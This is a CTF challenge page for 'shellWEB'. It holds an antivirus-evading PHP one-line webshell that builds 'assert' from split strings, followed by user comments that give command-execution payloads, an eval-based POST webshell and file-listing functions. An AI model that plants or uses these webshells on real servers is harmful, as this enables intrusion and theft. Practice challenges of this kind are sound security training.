shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 5483
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
ximing 3年前

根据描述应该应该是一个一句话木马,直接提交命令system(ls),然后在直接访问flag文件

回复 0

shan 3年前

用system(dir)来过这个题目,是作者本来的思路吗。看评论好像大家用的方法还挺多种的。

回复 0

yinyue 3年前

不多说了,套娃了解下

回复 1

eleven 3年前

?s=system("cat *.txt")

回复 0

naihe567 3年前

没法用POST的webshell,可以自己创建一个命令执行eval($_POST[‘xxx’]) 密码xxx

回复 1

mantou 3年前

http://114.67.246.176:18711/?s=system(%22cat%20xxxxxxxx.txt%22)

回复 0

Y1rannn 3年前

...没那么复杂啊,我直接s=system("")

回复 3

pest 3年前

除了菜刀,还可以利用print_r(glob("*.*")) scandir() //作用能扫描文件夹下的目录和文件,返回值为所有文件名组成的一个数组 show_source() //显示文件源码 highlight_file() //和show_source()函数是一个意思 我直接复制的一个大佬的wp过来的。

回复 0

simpleboy 3年前

解法还是很多的

回复 0

simpleboy 3年前

命令执行了

回复 0

WriteUp

image
harry

3 金币

评分(8)

解题动态

Ta7suya 攻破了该题 29分钟前
kfdwty 攻破了该题 18小时前
z791458703 攻破了该题 1天前
1720713439 攻破了该题 1天前
ct1640 攻破了该题 1天前
shbshb123 攻破了该题 1天前
18075013015 攻破了该题 1天前
15137086876 攻破了该题 2天前
wenbojia 攻破了该题 3天前
DOMAKE 攻破了该题 3天前
咔咔 攻破了该题 3天前
lishenyuchen 攻破了该题 3天前
请她喝一杯 攻破了该题 3天前
haha888 攻破了该题 4天前
2046185809 攻破了该题 4天前
gaohaofeng 攻破了该题 4天前
hulihaha 攻破了该题 4天前
hyukoh 攻破了该题 4天前
yuminna 攻破了该题 4天前
lindaxu 攻破了该题 4天前
问题反馈